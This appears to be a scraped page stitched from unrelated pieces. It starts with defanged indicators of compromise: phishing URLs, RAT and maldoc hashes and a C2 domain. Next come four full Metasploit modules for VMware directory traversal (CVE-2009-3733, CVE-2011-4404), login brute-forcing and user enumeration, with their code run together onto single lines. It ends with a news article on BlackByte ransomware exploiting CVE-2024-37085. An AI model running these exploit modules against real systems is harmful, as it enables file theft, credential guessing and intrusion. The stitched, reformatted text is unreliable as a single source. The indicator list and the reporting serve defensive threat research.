hxxps\[://\]d2v6ycjbdzo6ui\[.\]cloudfront\[.\]net/HubsExtension/Resource/Type/c8d984\[.\]php

hxxps\[://\]d2z6sfzo660xrm\[.\]cloudfront\[.\]net/HubsExtension/Browse/resourceType/id\[.\]php

hxxps\[://\]d2z6sfzo660xrm\[.\]cloudfront\[.\]net/HubsExtension/Resource/Type/c8d984\[.\]php

**Theme 3**

e1ee389b2af2d3a0eff4aa14f2ac3de6cdd4a73de80b5d450a44ec69cd332dbf - Excel malicious workbook

80731db97c33b50cd3d8727decec7e6a12bbf5f671527648c4cbb559fabc3074 - payload PhantomCore RAT

api.wilbderreis\[.\]ru - PhantomCore C2, using rsocket protocol on port 80

hxxp\[://\]td\[.\]tula-steel\[.\]ru/en/image\[.\]jpg

**Theme 4**

2c0a66c6370b4aa88ab3805d520e868cbc513b43119958257a72c9ff58ef241c - NMLS renewal theme maldoc

hxxps\[://\]share\[.\]dedesignanddev\[.\]com:443/datadoc

Threat actors using MacroPack to deploy Brute Ratel, Havoc and PhantomCore payloads

This Metasploit modules exploits the VMware Server Directory Traversal vulnerability in VMware Server 1.x before 1.0.10 build 203137 and 2.x before 2.0.2 build 203138 on Linux, VMware ESXi 3.5, and VMware ESX 3.0.3 and 3.5 allows remote attackers to read arbitrary files. Common VMware server ports 80/8222 and 443/8333 SSL. If you want to download the entire VM, check out the gueststealer tool.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  # Exploit mixins should be called first  include Msf::Exploit::Remote::HttpClient  # Scanner mixin should be near last  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  def initialize    super(      'Name'        => 'VMware Server Directory Traversal Vulnerability',      'Description' => 'This modules exploits the VMware Server Directory Traversal        vulnerability in VMware Server 1.x before 1.0.10 build 203137 and 2.x before        2.0.2 build 203138 on Linux, VMware ESXi 3.5, and VMware ESX 3.0.3 and 3.5        allows remote attackers to read arbitrary files. Common VMware server ports        80/8222 and 443/8333 SSL.  If you want to download the entire VM, check out        the gueststealer tool.',      'Author'      => 'CG' ,      'License'     => MSF_LICENSE,      'References'  =>        [          [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2009-0015.html' ],          [ 'OSVDB', '59440' ],          [ 'BID', '36842' ],          [ 'CVE', '2009-3733' ],          [ 'URL', 'http://fyrmassociates.com/tools/gueststealer-v1.1.pl' ]        ]    )    register_options(      [        Opt::RPORT(8222),        OptString.new('FILE', [ true,  "The file to view", '/etc/vmware/hostd/vmInventory.xml']),        OptString.new('TRAV', [ true,  "Traversal Depth", '/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E']),      ])  end  def run_host(target_host)    begin      file = datastore['FILE']      trav = datastore['TRAV']      res = send_request_raw({        'uri'          => trav+file,        'version'      => '1.1',        'method'       => 'GET'      }, 25)      if res.nil?        print_error("Connection timed out")        return      end      if res.code == 200        #print_status("Output Of Requested File:\n#{res.body}")        print_good("#{target_host}:#{rport} appears vulnerable to VMWare Directory Traversal Vulnerability")        report_vuln(          {            :host   => target_host,            :port  => rport,            :proto  => 'tcp',            :name  => self.name,            :info   => "Module #{self.fullname} reports directory traversal of #{target_host}:#{rport} with response code #{res.code}",            :refs   => self.references,            :exploited_at => Time.now.utc          }        )      else        vprint_status("Received #{res.code} for #{trav}#{file}")      end    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e      print_error(e.message)    rescue ::Timeout::Error, ::Errno::EPIPE    end  endend

VMware Server Directory Traversal

This Metasploit module attempts to authenticate to the VMWare HTTP service for VmWare Server, ESX, and ESXI.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::VIMSoap  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Report  include Msf::Auxiliary::AuthBrute  include Msf::Auxiliary::Scanner  def initialize    super(      'Name'           => 'VMWare Web Login Scanner',      'Description'    => 'This module attempts to authenticate to the VMWare HTTP service        for VmWare Server, ESX, and ESXI',      'Author'         => ['theLightCosine'],      'References'     =>        [          [ 'CVE', '1999-0502'] # Weak password        ],      'License'        => MSF_LICENSE,      'DefaultOptions' => { 'SSL' => true }    )    register_options(      [        OptString.new('URI', [true, "The default URI to login with", "/sdk"]),        Opt::RPORT(443)      ])  end  def report_cred(opts)    service_data = {      address: opts[:ip],      port: opts[:port],      service_name: 'vmware',      protocol: 'tcp',      workspace_id: myworkspace_id    }    credential_data = {      origin_type: :service,      module_fullname: fullname,      username: opts[:user],      private_data: opts[:password],      private_type: :password    }.merge(service_data)    login_data = {      last_attempted_at: DateTime.now,      core: create_credential(credential_data),      status: Metasploit::Model::Login::Status::SUCCESSFUL,      proof: opts[:proof]    }.merge(service_data)    create_credential_login(login_data)  end  def run_host(ip)    return unless is_vmware?    each_user_pass { |user, pass|      result = vim_do_login(user, pass)      case result      when :success        print_good "#{rhost}:#{rport} - Successful Login! (#{user}:#{pass})"        report_cred(ip: rhost, port: rport, user: user, password: pass, proof: result)        return if datastore['STOP_ON_SUCCESS']      when :fail        print_error "#{rhost}:#{rport} - Login Failure (#{user}:#{pass})"      end    }  end  # Mostly taken from the Apache Tomcat service validator  def is_vmware?    soap_data =      %Q|<env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">      <env:Body>      <RetrieveServiceContent xmlns="urn:vim25">        <_this type="ServiceInstance">ServiceInstance</_this>      </RetrieveServiceContent>      </env:Body>      </env:Envelope>|    res = send_request_cgi({      'uri'     => normalize_uri(datastore['URI']),      'method'  => 'POST',      'agent'   => 'VMware VI Client',      'data'    => soap_data    }, 25)    unless res      vprint_error("#{rhost}:#{rport} Error: no response")      return false    end    fingerprint_vmware(res)  rescue ::Rex::ConnectionError => e    vprint_error("#{rhost}:#{rport} Error: could not connect")    return false  rescue => e    vprint_error("#{rhost}:#{rport} Error: #{e}")    return false  end  def fingerprint_vmware(res)    unless res      vprint_error("#{rhost}:#{rport} Error: no response")      return false    end    return false unless res.body.include?('<vendor>VMware, Inc.</vendor>')    os_match = res.body.match(/<name>([\w\s]+)<\/name>/)    ver_match = res.body.match(/<version>([\w\s\.]+)<\/version>/)    build_match = res.body.match(/<build>([\w\s\.\-]+)<\/build>/)    full_match = res.body.match(/<fullName>([\w\s\.\-]+)<\/fullName>/)    if full_match      print_good "#{rhost}:#{rport} - Identified #{full_match[1]}"      report_service(:host => rhost, :port => rport, :proto => 'tcp', :sname => 'https', :info => full_match[1])    end    unless os_match and ver_match and build_match      vprint_error("#{rhost}:#{rport} Error: Could not identify host as VMWare")      return false    end    if os_match[1].include?('ESX') || os_match[1].include?('vCenter')      # Report a fingerprint match for OS identification      report_note(        :host  => rhost,        :ntype => 'fingerprint.match',        :data  => {'os.vendor' => 'VMware', 'os.product' => os_match[1] + " " + ver_match[1], 'os.version' => build_match[1] }      )      return true    end  endend

VMWare Web Login Scanner

This Metasploit modules exploits a directory traversal vulnerability in VMWare Update Manager on port 9084. Versions affected by this vulnerability: vCenter Update Manager 4.1 prior to Update 2, vCenter Update Manager 4 Update 4.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Report  include Msf::Auxiliary::Scanner  def initialize(info={})    super(update_info(info,      'Name'           => "VMWare Update Manager 4 Directory Traversal",      'Description'    => %q{        This modules exploits a directory traversal vulnerability in VMWare Update Manager        on port 9084.  Versions affected by this vulnerability: vCenter Update Manager        4.1 prior to Update 2, vCenter Update Manager 4 Update 4.      },      'License'        => MSF_LICENSE,      'Author'         =>        [          'Alexey Sintsov',  #Initial discovery, poc          'sinn3r'           #Metasploit        ],      'References'     =>        [          ['CVE', '2011-4404'],          ['EDB', '18138'],          ['URL', 'https://www.vmware.com/security/advisories/VMSA-2011-0014.html'],          ['URL', 'http://dsecrg.com/pages/vul/show.php?id=342']        ],      'DisclosureDate' => '2011-11-21'))    register_options(      [        Opt::RPORT(9084),        OptString.new('URIPATH', [true, 'URI path to the downloads', '/vci/downloads/']),        OptString.new('FILE', [true, 'Define the remote file to download', 'windows\\win.ini'])      ])  end  def run_host(ip)    fname     = File.basename(datastore['FILE'])    traversal = ".\\..\\..\\..\\..\\..\\..\\..\\"    uri = normalize_uri(datastore['URIPATH']) + traversal + datastore['FILE']    print_status("#{rhost}:#{rport} - Requesting: #{uri}")    res = send_request_raw({      'method' => 'GET',      'uri'    => uri    }, 25)    # If there's no response, don't bother    if res.nil? or res.body.empty?      print_error("No content retrieved from: #{ip}")      return    end    if res.code == 404      print_error("#{rhost}:#{rport} - File not found")      return    else      print_good("File retrieved from: #{ip}")      p = store_loot("vmware.traversal.file", "application/octet-stream", rhost, res.to_s, fname)      print_good("File stored in: #{p}")    end  endend

VMWare Update Manager 4 Directory Traversal

This Metasploit module will log into the Web API of VMWare and try to enumerate all the user accounts. If the VMware instance is connected to one or more domains, it will try to enumerate domain users as well.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::VIMSoap  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Report  include Msf::Auxiliary::Scanner  def initialize    super(      'Name'           => 'VMWare Enumerate User Accounts',      'Description'    => %Q{        This module will log into the Web API of VMWare and try to enumerate        all the user accounts. If the VMware instance is connected to one or        more domains, it will try to enumerate domain users as well.      },      'Author'         => ['theLightCosine'],      'License'        => MSF_LICENSE,      'DefaultOptions' => { 'SSL' => true }    )    register_options(      [        Opt::RPORT(443),        OptString.new('USERNAME', [ true, "The username to Authenticate with.", 'root' ]),        OptString.new('PASSWORD', [ true, "The password to Authenticate with.", 'password' ])      ])  end  def run_host(ip)    if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success      # Get local Users and Groups      user_list = vim_get_user_list(nil)      tmp_users = Rex::Text::Table.new(        'Header'  => "Users for server #{ip}",        'Indent'  => 1,        'Columns' => ['Name', 'Description']      )      tmp_groups = Rex::Text::Table.new(        'Header'  => "Groups for server #{ip}",        'Indent'  => 1,        'Columns' => ['Name', 'Description']      )      unless user_list.nil?        case user_list        when :noresponse          print_error "Received no response from #{ip}"        when :expired          print_error "The login session appears to have expired on #{ip}"        when :error          print_error "An error occurred while trying to enumerate the users for #{domain} on #{ip}"        else          user_list.each do |obj|            if obj['group'] == 'true'              tmp_groups << [obj['principal'], obj['fullName']]            else              tmp_users <<  [obj['principal'], obj['fullName']]            end          end          print_good tmp_groups.to_s          store_loot('host.vmware.groups', "text/plain", datastore['RHOST'], tmp_groups.to_csv , "#{datastore['RHOST']}_esx_groups.txt", "VMWare ESX User Groups")          print_good tmp_users.to_s          store_loot('host.vmware.users', "text/plain", datastore['RHOST'], tmp_users.to_csv , "#{datastore['RHOST']}_esx_users.txt", "VMWare ESX Users")        end      end      # Enumerate Domains the Server is connected to      esx_domains = vim_get_domains      case esx_domains      when :noresponse        print_error "Received no response from #{ip}"      when :expired        print_error "The login session appears to have expired on #{ip}"      when :error        print_error "An error occurred while trying to enumerate the domains on #{ip}"      else        # Enumerate Domain Users and Groups        esx_domains.each do |domain|          tmp_dusers = Rex::Text::Table.new(            'Header'  => "Users for domain #{domain}",            'Indent'  => 1,            'Columns' => ['Name', 'Description']          )          tmp_dgroups = Rex::Text::Table.new(            'Header'  => "Groups for domain #{domain}",            'Indent'  => 1,            'Columns' => ['Name', 'Description']          )          user_list = vim_get_user_list(domain)          case user_list          when nil            next          when :noresponse            print_error "Received no response from #{ip}"          when :expired            print_error "The login session appears to have expired on #{ip}"          when :error            print_error "An error occurred while trying to enumerate the users for #{domain} on #{ip}"          else            user_list.each do |obj|              if obj['group'] == 'true'                tmp_dgroups << [obj['principal'], obj['fullName']]              else                tmp_dusers <<  [obj['principal'], obj['fullName']]              end            end            print_good tmp_dgroups.to_s            f = store_loot('domain.groups', "text/plain", datastore['RHOST'], tmp_dgroups.to_csv , "#{domain}_esx_groups.txt", "VMWare ESX #{domain} Domain User Groups")            vprint_status("VMWare domain user groups stored in: #{f}")            print_good tmp_dusers.to_s            f = store_loot('domain.users', "text/plain", datastore['RHOST'], tmp_dgroups.to_csv , "#{domain}_esx_users.txt", "VMWare ESX #{domain} Domain Users")            vprint_status("VMWare users stored in: #{f}")          end        end      end    else      print_error "Login failure on #{ip}"      return    end  endend

VMWare Enumerate User Accounts

The threat actors behind the BlackByte ransomware group have been observed likely exploiting a recently patched security flaw impacting VMware ESXi hypervisors, while also leveraging various vulnerable drivers to disarm security protections.
"The BlackByte ransomware group continues to leverage tactics, techniques, and procedures (TTPs) that have formed the foundation of its tradecraft since its

The threat actors behind the BlackByte ransomware group have been observed likely exploiting a recently patched security flaw impacting VMware ESXi hypervisors, while also leveraging various vulnerable drivers to disarm security protections.

"The BlackByte ransomware group continues to leverage tactics, techniques, and procedures (TTPs) that have formed the foundation of its tradecraft since its inception, continuously iterating its use of vulnerable drivers to bypass security protections and deploying a self-propagating, wormable ransomware encryptor," Cisco Talos said in a technical report shared with The Hacker News.

The exploitation of CVE-2024-37085, an authentication bypass vulnerability in VMware ESXi that has also been weaponized by other ransomware groups, is a sign that the e-crime group is pivoting from established approaches.

BlackByte made its debut in the second half of 2021 and is purported to be one of the ransomware variants to have emerged in the months leading up to shutdown of the infamous Conti ransomware crew.

The ransomware-as-a-service (RaaS) group has a history of exploiting ProxyShell vulnerabilities in Microsoft Exchange Server to obtain initial access, while avoiding systems that use Russian and a number of Eastern European languages.

Like RaaS groups, it also leverages double extortion as part of attacks, adopting a name-and-shame approach via a data leak site operated on the dark web to pressurize victims into paying up. Multiple variants of the ransomware, written in C, .NET, and Go, have been observed in the wild to date.

While a decryptor for BlackByte was released by Trustwave in October 2021, the group has continued to refine its modus operandi, even going to the extent of employing a custom tool named ExByte for data exfiltration prior to commencing encryption.

An advisory released by the U.S. government in early 2022 attributed the RaaS group to financially motivated attacks targeting critical infrastructure sectors, including financial, food and agriculture, and government facilities.

One of the important aspects of their attacks is the use of vulnerable drivers to terminate security processes and bypass controls, a technique known as bring your own vulnerable driver (BYOVD).

Cisco Talos, which investigated a recent BlackByte ransomware attack, said the intrusion was likely facilitated using valid credentials to access the victim organization's VPN. It's believed that the initial access was obtained through a brute-force attack.

"Given BlackByte's history of exploiting public-facing vulnerabilities for initial access, the use of VPN for remote access may represent a slight shift in technique or could represent opportunism," security researchers James Nutland, Craig Jackson, Terryn Valikodath, and Brennan Evans said. "The use of the victim's VPN for remote access also affords the adversary other advantages, including reduced visibility from the organization's EDR."

The threat actor subsequently managed to escalate their privileges, using the permissions to access the organization's VMware vCenter server to create and add new accounts to an Active Directory group named ESX Admins. This, Talos said, was done by exploiting CVE-2024-37085, which enables an attacker to gain administrator privileges on the hypervisor by creating a group with that name and adding any user to it.

This privilege could then be abused to control virtual machines (VMs), modify host server's configuration, and gain unauthorized access to system logs, diagnostics, and performance monitoring tools.

Talos pointed out that the exploitation of the flaw took place within days of public disclosure, highlighting the speed at which threat actors refine their tactics to incorporate newly disclosed vulnerabilities into their arsenal and advance their attacks.

Furthermore, the recent BlackByte attacks culminate with the encrypted files being rewritten with the file extension "blackbytent\_h," with the encryptor also dropping four vulnerable drivers as part of the BYOVD attack. All the four drivers follow a similar naming convention: Eight random alphanumeric characters followed by an underscore and an incremental numerical value -

*   AM35W2PH (RtCore64.sys)
*   AM35W2PH\_1 (DBUtil\_2\_3.sys)
*   AM35W2PH\_2 (zamguard64.sys aka Terminator)
*   AM35W2PH\_3 (gdrv.sys)

The professional, scientific, and technical services sectors have the greatest exposure to the observed vulnerable drivers, accounting for 15% of the total, followed by manufacturing (13%) and educational services (13%). Talos has also assessed that the threat actor is likely more active than what it appears to be, and that only an estimated 20-30% of victims are publicly posted, although the exact reason for this disparity remains unclear.

"BlackByte's progression in programming languages from C# to Go and subsequently to C/C++ in the latest version of its encryptor – BlackByteNT – represents a deliberate effort to increase the malware's resilience against detection and analysis," the researchers said.

"Complex languages like C/C++ allow for the incorporation of advanced anti-analysis and anti-debugging techniques, which have been observed across the BlackByte tooling during detailed analysis by other security researchers."

The disclosure comes as Group-IB unpacked the tactics associated with two other ransomware strains tracked as Brain Cipher and RansomHub, underscoring the potential connections of the former with ransomware groups such as EstateRansomware, SenSayQ, and RebornRansomware.

"There are similarities in terms of style and content of the Brain Cipher's ransom note to those by SenSayQ ransomware," the Singaporean cybersecurity company said. "The TOR websites of Brain Cipher ransomware group and SenSayQ ransomware group use similar technologies and scripts."

RansomHub, on the other hand, has been observed recruiting former affiliates of Scattered Spider, a detail that first came to light last month. A majority of the attacks have targeted healthcare, finance, and government sectors in the U.S., Brazil, Italy, Spain, and the U.K.

"For initial access the affiliates usually purchase compromised valid domain accounts from Initial Access Brokers (IABs) and external remote services," Group-IB said, adding the "accounts have been acquired via LummaC2 stealer."

"RansomHub's tactics include leveraging compromised domain accounts and public VPNs for initial access, followed by data exfiltration and extensive encryption processes. Their recent introduction of a RaaS affiliate program and use of high-demand ransom payments illustrate their evolving and aggressive approach."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#vmware